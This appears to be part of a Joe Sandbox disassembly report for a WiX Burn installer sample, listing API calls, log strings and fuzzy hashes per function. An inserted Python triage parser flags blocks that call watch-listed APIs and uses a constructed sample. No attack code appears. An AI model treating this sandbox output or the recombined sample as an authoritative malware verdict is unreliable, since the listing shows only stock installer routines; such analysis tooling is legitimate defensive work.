                                                            • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                            • API String ID: 3613110473-1671347822
                                                            • Opcode ID: 119187e1753142a1db9f50b3d9245b3be74ccba462c4bb564c8d9718d1bbb638
                                                            • Instruction ID: 13ce47b7a30f3263df32b1ffd49429d32e811fd087cd8de87a3906bb5768fe05
                                                            • Opcode Fuzzy Hash: 119187e1753142a1db9f50b3d9245b3be74ccba462c4bb564c8d9718d1bbb638
                                                            • Instruction Fuzzy Hash: 1D41D432900115BACF25AAACCC86EFEB769FF04320F24C616F55DE2299DB30DA40D752
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0087F942
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 0087F94F
                                                            Strings
                                                            • %ls.RebootRequired, xrefs: 0087F82F
                                                            • Failed to read Resume value., xrefs: 0087F8D8
                                                            • Failed to format pending restart registry key to read., xrefs: 0087F846
                                                            • Resume, xrefs: 0087F8B6
                                                            • Failed to open registration key., xrefs: 0087F8AB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                            • API String ID: 3535843008-3890505273
                                                            • Opcode ID: 732e0b8233563b256de0ef98322d31167e92fc161aaa587a182bc9e5e23a6a90
                                                            • Instruction ID: 695253c3628afa03e363c8277c4908ae29b30f34f297b98ae0b0bd04c74d282e
                                                            • Opcode Fuzzy Hash: 732e0b8233563b256de0ef98322d31167e92fc161aaa587a182bc9e5e23a6a90
                                                            • Instruction Fuzzy Hash: 9A414871904119FBCF119FAAC880BA9BBB4FF04314F15817AEA18EB356C371EE419B81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                            • API String ID: 0-660234312
                                                            • Opcode ID: eaf950a22ff27b554a4c3a6dd1a7e43c4a55eca560c22cf267146f57e7a894be
                                                            • Instruction ID: 44d73fbdd3bacda7a8b7cfe0bbb37f6cfc635ac27927c7878e3028c1186c24ea
                                                            • Opcode Fuzzy Hash: eaf950a22ff27b554a4c3a6dd1a7e43c4a55eca560c22cf267146f57e7a894be
                                                            • Instruction Fuzzy Hash: 5631C532940129BBDB2AAA98CC45F9EBB79FF10720F104266F920F62D0DB71DE40C791
                                                            APIs
                                                            • CoCreateInstance.OLE32(008D0C4C,00000000,00000017,008D0C5C,?,?,00000000,00000000,?,?,?,?,?,0089DEE7,00000000,00000000), ref: 0089D8E8
                                                            Strings
                                                            • Failed to create IBackgroundCopyManager., xrefs: 0089D8F4
                                                            • Failed to set progress timeout., xrefs: 0089D952
                                                            • WixBurn, xrefs: 0089D913
                                                            • Failed to create BITS job., xrefs: 0089D922
                                                            • Failed to set BITS job to foreground., xrefs: 0089D969
                                                            • Failed to set notification flags for BITS job., xrefs: 0089D93A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateInstance
                                                            • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                            • API String ID: 542301482-468763447
                                                            • Opcode ID: b93c4721847f5814ba57368513e60f7c1dc7a2ba87cf56a8c9e9659ad322eaf6
                                                            • Instruction ID: 07c6756626fc8c0603ff9321ee556eedc7eae21e07fc074f19fa66536a6d8e30
                                                            • Opcode Fuzzy Hash: b93c4721847f5814ba57368513e60f7c1dc7a2ba87cf56a8c9e9659ad322eaf6
                                                            • Instruction Fuzzy Hash: CD316131A4031AAF9B15EFA9C845E7FBBF4FF48710B14466AE901EB351CA349C058B95
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 008B5DF8
                                                            • GetLastError.KERNEL32 ref: 008B5E05
                                                            • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 008B5E4C
                                                            • GetLastError.KERNEL32 ref: 008B5E80
                                                            • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 008B5EB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLast$CloseCreateHandleRead
                                                            • String ID: %ls.R$dlutil.cpp
                                                            • API String ID: 3160720760-657863730
                                                            • Opcode ID: 73419ca3ad906eb4ebe8aa135e23b08fd34cf5d9a52ac76ece8776dca8331496
                                                            • Instruction ID: 7188ef976d0e815c2a559a6212cba44eb3d3b56e37a0301736ddd32837f71997
                                                            • Opcode Fuzzy Hash: 73419ca3ad906eb4ebe8aa135e23b08fd34cf5d9a52ac76ece8776dca8331496
                                                            • Instruction Fuzzy Hash: 7F31B672D41A25ABDB218B98CC85BAE7BA4FF05721F114255FE15EB3C0E7B0DE0096E1
                                                            APIs
                                                              • Part of subcall function 0087CD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,0087E444,000000FF,00000000,00000000,0087E444,?,?,0087DBEB,?,?,?,?), ref: 0087CD89
                                                            • CreateFileW.KERNEL32(E9008BBA,80000000,00000005,00000000,00000003,08000000,00000000,008753C5,?,00000000,840F01E8,14680A79,00000001,008753BD,00000000,00875489), ref: 0087C956
                                                            • GetLastError.KERNEL32(?,?,?,00887809,0087566D,00875479,00875479,00000000,?,00875489,FFF9E89D,00875489,008754BD,00875445,?,00875445), ref: 0087C99B
                                                            Strings
                                                            • Failed to open catalog in working path: %ls, xrefs: 0087C9C9
                                                            • Failed to find payload for catalog file., xrefs: 0087C9E0
                                                            • Failed to verify catalog signature: %ls, xrefs: 0087C994
                                                            • catalog.cpp, xrefs: 0087C9BC
                                                            • Failed to get catalog local file path, xrefs: 0087C9D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareCreateErrorFileLastString
                                                            • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                            • API String ID: 1774366664-48089280
                                                            • Opcode ID: f8fac794945d420f34cf10249ddd2ad64281b50699d6d07e58fa4791929e9dde
                                                            • Instruction ID: 18027b5983e363d805556f9ab48e0ebc71a10fb2d8c1adac81eb83351bcbfeec
                                                            • Opcode Fuzzy Hash: f8fac794945d420f34cf10249ddd2ad64281b50699d6d07e58fa4791929e9dde
                                                            • Instruction Fuzzy Hash: C631C432940626BFC7219F58CC42B99BFA4FF04720F11C22ABA18EB355E670ED509BD1
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,0089D642,?), ref: 0089D357
                                                            • ReleaseMutex.KERNEL32(?,?,?,?,0089D642,?), ref: 0089D375
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0089D3B6
                                                            • ReleaseMutex.KERNEL32(?), ref: 0089D3CD
                                                            • SetEvent.KERNEL32(?), ref: 0089D3D6
                                                            Strings
                                                            • Failed to get message from netfx chainer., xrefs: 0089D3F7
                                                            • Failed to send files in use message from netfx chainer., xrefs: 0089D41C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: MutexObjectReleaseSingleWait$Event
                                                            • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                            • API String ID: 2608678126-3424578679
                                                            • Opcode ID: ea79a857d8f5aef248af7adb14a8bd40f3414fe41f1e4ba85dad0587aa3f27c7
                                                            • Instruction ID: c12da6e7fa0d7a495a8d8c20c7b9b4f30c296c7a4522310ace4776ce8430c001
                                                            • Opcode Fuzzy Hash: ea79a857d8f5aef248af7adb14a8bd40f3414fe41f1e4ba85dad0587aa3f27c7
                                                            • Instruction Fuzzy Hash: 5D31C631900719AFCF129F98DC08EAEBBF4FF44320F148255F965E2260C77099109B95
                                                            APIs
                                                            • CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 008B09AB
                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 008B09B5
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 008B09FE
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 008B0A0B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CreateErrorLastProcess
                                                            • String ID: "%ls" %ls$D$procutil.cpp
                                                            • API String ID: 161867955-2732225242
                                                            • Opcode ID: 681aee52e670f7ae62adb260f47f7423223936625b516aa5d96205ec20e453cf
                                                            • Instruction ID: 14d98d092119918960a8b475f88663c171b5252a5c682df622f30cb36200bedc
                                                            • Opcode Fuzzy Hash: 681aee52e670f7ae62adb260f47f7423223936625b516aa5d96205ec20e453cf
                                                            • Instruction Fuzzy Hash: 70212B72D0121EABDB11DFD9C941AEFBBB8FF04750F100525EA14F6311E7709E549AA2
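                                                            Triage aid for this listing: an added Python example (not part of the Joe Sandbox report and not WiX toolset code) that parses these per-function blocks into records, pulls out each function's API names and call-site addresses, recovers the engine source file names that WiX Burn embeds in its log strings (apply.cpp, dlutil.cpp, procutil.cpp, ...), and flags blocks that call a watch list of APIs. The section headings and bullet layout are taken from the report format above; the embedded sample text is a constructed, trimmed recombination of three blocks from this listing, not a verbatim copy.

```python
# Parser for the per-function blocks of a Joe Sandbox disassembly listing
# (sections: APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin,
# Similarity). A block ends at its "Instruction Fuzzy Hash" field.
import re
from typing import Dict, Iterable, List

BULLET = "\u2022"  # every field in the report is rendered as a "•" bullet
SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

# Matches "CreateFileW.KERNEL32(00000000,C0000000), ref: 008B5DF8",
# "GetLastError.KERNEL32 ref: 008B5E05" and the indented
# "Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(...), ref: 00873967".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[\w@]+)\.(?P<module>[\w\-]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)


def parse_blocks(text: str) -> List[Dict]:
    """Split the listing into function blocks and parse each section."""
    blocks: List[Dict] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if cur is None:  # first heading of a new block
                cur = {"apis": [], "strings": [], "similarity": {}}
            section = line
            continue
        if cur is None or not line.startswith(BULLET):
            continue
        field = line[len(BULLET):].strip()
        if section == "APIs":
            m = API_RE.match(field)
            if m:  # direct calls have caller=None; subcall entries name the callee
                cur["apis"].append({k: m.group(k) for k in ("name", "module", "ref", "caller")})
        elif section == "Strings":
            value, _, xref = field.rpartition(", xrefs: ")
            cur["strings"].append({"value": value, "xref": xref})
        elif section == "Similarity":
            key, _, value = field.partition(":")
            cur["similarity"][key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":  # last field of a block
                blocks.append(cur)
                cur, section = None, None
    return blocks


def api_names(block: Dict) -> List[str]:
    """APIs the function calls itself (subcall entries belong to a callee)."""
    return sorted({a["name"] for a in block["apis"] if a["caller"] is None})


def source_files(block: Dict) -> List[str]:
    """WiX Burn tags its log strings with the engine source file; recover them."""
    joined = block["similarity"].get("String ID", "")  # report joins strings with "$"
    return sorted({s for s in joined.split("$") if s.endswith(".cpp")})


def flag(blocks: List[Dict], watch: Iterable[str]) -> List[Dict]:
    """Blocks that call (directly or via a subcall) any API on the watch list."""
    watch = set(watch)
    return [b for b in blocks if watch & {a["name"] for a in b["apis"]}]


# Constructed sample: three blocks trimmed and recombined from the listing above.
SAMPLE = r"""
APIs
• GetLastError.KERNEL32 ref: 008B6513
• DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF), ref: 008B660A
• CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF), ref: 008B6619
Strings
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: CloseDeleteErrorFileHandleLast
• String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
• API String ID: 3522763407-1704223933
• Instruction Fuzzy Hash: 53510972D00119BBDF11DFA48C45AEFBBB9FF08710F144166FA14E6250E7359A219BA1
APIs
• _MREFOpen@16.MSPDB140-MSVCRT ref: 00879EED
• _MREFOpen@16.MSPDB140-MSVCRT ref: 00879F12
Strings
• Failed to get component path: %d, xrefs: 00879F76
• MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 0087A006
Similarity
• API ID: Open@16
• String ID: Failed to get component path: %d$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
• API String ID: 3613110473-1671347822
• Instruction Fuzzy Hash: 1D41D432900115BACF25AAACCC86EFEB769FF04320F24C616F55DE2299DB30DA40D752
APIs
  • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7), ref: 00873960
• CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000), ref: 008B09AB
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 008B09B5
• CloseHandle.KERNEL32(?,?,?,?,?,00000000), ref: 008B09FE
Strings
Similarity
• API ID: CloseHandle$CreateErrorLastProcess
• String ID: "%ls" %ls$D$procutil.cpp
• API String ID: 161867955-2732225242
• Instruction Fuzzy Hash: 70212B72D0121EABDB11DFD9C941AEFBBB8FF04750F100525EA14F6311E7709E549AA2
"""

if __name__ == "__main__":
    for b in flag(parse_blocks(SAMPLE), {"CreateProcessW", "DeleteFileW"}):
        print(source_files(b), api_names(b), b["similarity"]["API String ID"])
```

                                                            Feed it the text of the full listing instead of SAMPLE to get one record per function; the "API String ID" and fuzzy-hash fields then give you stable keys for comparing this bundle's engine functions against other Burn-built samples, and the recovered source file names separate the stock Burn engine code from anything that carries none of its log strings.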
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879BB3
                                                            • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0087A8AB,00000100,000002C0,000002C0,00000100), ref: 00879BD3
                                                            • GetLastError.KERNEL32(?,0087A8AB,00000100,000002C0,000002C0,00000100), ref: 00879BDE
                                                            Strings
                                                            • Failed to format variable string., xrefs: 00879BBE
                                                            • Failed to set directory search path variable., xrefs: 00879C0F
                                                            • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00879C4A
                                                            • Failed while searching directory search: %ls, for path: %ls, xrefs: 00879C34
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileLastOpen@16
                                                            • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                            • API String ID: 1811509786-2966038646
                                                            • Opcode ID: 154c73b73948d417b2913b560d73861f9392e0031dcc7503af109065ceb1c428
                                                            • Instruction ID: f100b0a471008bb8edbbfed18574450da7303f8624dd3de4e0069eeb3854fc88
                                                            • Opcode Fuzzy Hash: 154c73b73948d417b2913b560d73861f9392e0031dcc7503af109065ceb1c428
                                                            • Instruction Fuzzy Hash: 2221DA32D40025FBCF1356988D06B9DBBA9FF10360F208211F958F62559765DE50AAC9
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879D64
                                                            • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0087A883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00879D84
                                                            • GetLastError.KERNEL32(?,0087A883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00879D8F
                                                            Strings
                                                            • Failed to set variable to file search path., xrefs: 00879DE7
                                                            • Failed to format variable string., xrefs: 00879D6F
                                                            • Failed while searching file search: %ls, for path: %ls, xrefs: 00879DBD
                                                            • File search: %ls, did not find path: %ls, xrefs: 00879DF3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AttributesErrorFileLastOpen@16
                                                            • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                            • API String ID: 1811509786-3425311760
                                                            • Opcode ID: de0785744f0a30b710cc4be0136a162475e4972feddf47e4c4c63f74154c11cd
                                                            • Instruction ID: a129f2972d60a45f028d111f0bc9d1797081c098192e050fd213d99adf1f6fa9
                                                            • Opcode Fuzzy Hash: de0785744f0a30b710cc4be0136a162475e4972feddf47e4c4c63f74154c11cd
                                                            • Instruction Fuzzy Hash: DB11F333840525BBDB22669CCD06ADEBB25FF00720F208251F968F6261E762DE10A6D1
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?), ref: 0088CF37
                                                            • GetLastError.KERNEL32(?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0088CF41
                                                            • GetExitCodeThread.KERNEL32(00000001,?,?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000), ref: 0088CF7D
                                                            • GetLastError.KERNEL32(?,?,0088D365,00000000,?,?,0088C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0088CF87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                            • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                            • API String ID: 3686190907-1954264426
                                                            • Opcode ID: 3b9dcdb7525a2e2d20a283dbf66572cb46bd68c993534c20d65eaf8cdb3d20d9
                                                            • Instruction ID: 76e5952692994cdc8f9c5986b514cbcc7d0d1aebe1ad44fa9ca87d216e7db0f4
                                                            • Opcode Fuzzy Hash: 3b9dcdb7525a2e2d20a283dbf66572cb46bd68c993534c20d65eaf8cdb3d20d9
                                                            • Instruction Fuzzy Hash: 50012633A81A3567A72067854C05A5F7A59FF00B61B014225BF14FA280EBB4CC0086F5
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00886EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008869BB
                                                            • GetLastError.KERNEL32(?,00886EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008869C5
                                                            • GetExitCodeThread.KERNEL32(00000001,00000000,?,00886EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00886A04
                                                            • GetLastError.KERNEL32(?,00886EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00886A0E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                            • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                            • API String ID: 3686190907-2546940223
                                                            • Opcode ID: 743e40dd574b6bf0a5db6705767e254f0482e192941a80c17cc7a8c5071a5927
                                                            • Instruction ID: 8f4231c231423aa741b0aa367efdcb40c429100d7373ad76417b5700c055ba37
                                                            • Opcode Fuzzy Hash: 743e40dd574b6bf0a5db6705767e254f0482e192941a80c17cc7a8c5071a5927
                                                            • Instruction Fuzzy Hash: 65115270680216BBDB10AFA59D02F7E7AA8FF00711F104179B914E9290FB75CA609765
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0088F7EE
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0088F8FB
                                                            Strings
                                                            • Failed to set source path for payload., xrefs: 0088F88A
                                                            • Engine is active, cannot change engine state., xrefs: 0088F808
                                                            • Failed to set source path for container., xrefs: 0088F8E0
                                                            • UX denied while trying to set source on embedded payload: %ls, xrefs: 0088F870
                                                            • UX requested unknown container with id: %ls, xrefs: 0088F8BA
                                                            • UX requested unknown payload with id: %ls, xrefs: 0088F85A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                            • API String ID: 3168844106-4121889706
                                                            • Opcode ID: 97e27b12116047dfcb9cce49b9ca6824b090aba55a4d0f7c1985b5fcf3b7642f
                                                            • Instruction ID: ae2fc6d1ca83429ff9f1639f4b4f384d6366b683dc0e287b70679a9013ebd45a
                                                            • Opcode Fuzzy Hash: 97e27b12116047dfcb9cce49b9ca6824b090aba55a4d0f7c1985b5fcf3b7642f
                                                            • Instruction Fuzzy Hash: 4D31E532A40669AF8B21AB58CC45E6BB7BCFF14724715813AF904EB342DB79ED009791
                                                            APIs
                                                            • lstrlenW.KERNEL32(00000000), ref: 00877210
                                                            Strings
                                                            • Failed to format escape sequence., xrefs: 008772AA
                                                            • []{}, xrefs: 0087723A
                                                            • Failed to append characters., xrefs: 0087729C
                                                            • Failed to copy string., xrefs: 008772C4
                                                            • [\%c], xrefs: 0087726F
                                                            • Failed to append escape sequence., xrefs: 008772A3
                                                            • Failed to allocate buffer for escaped string., xrefs: 00877227
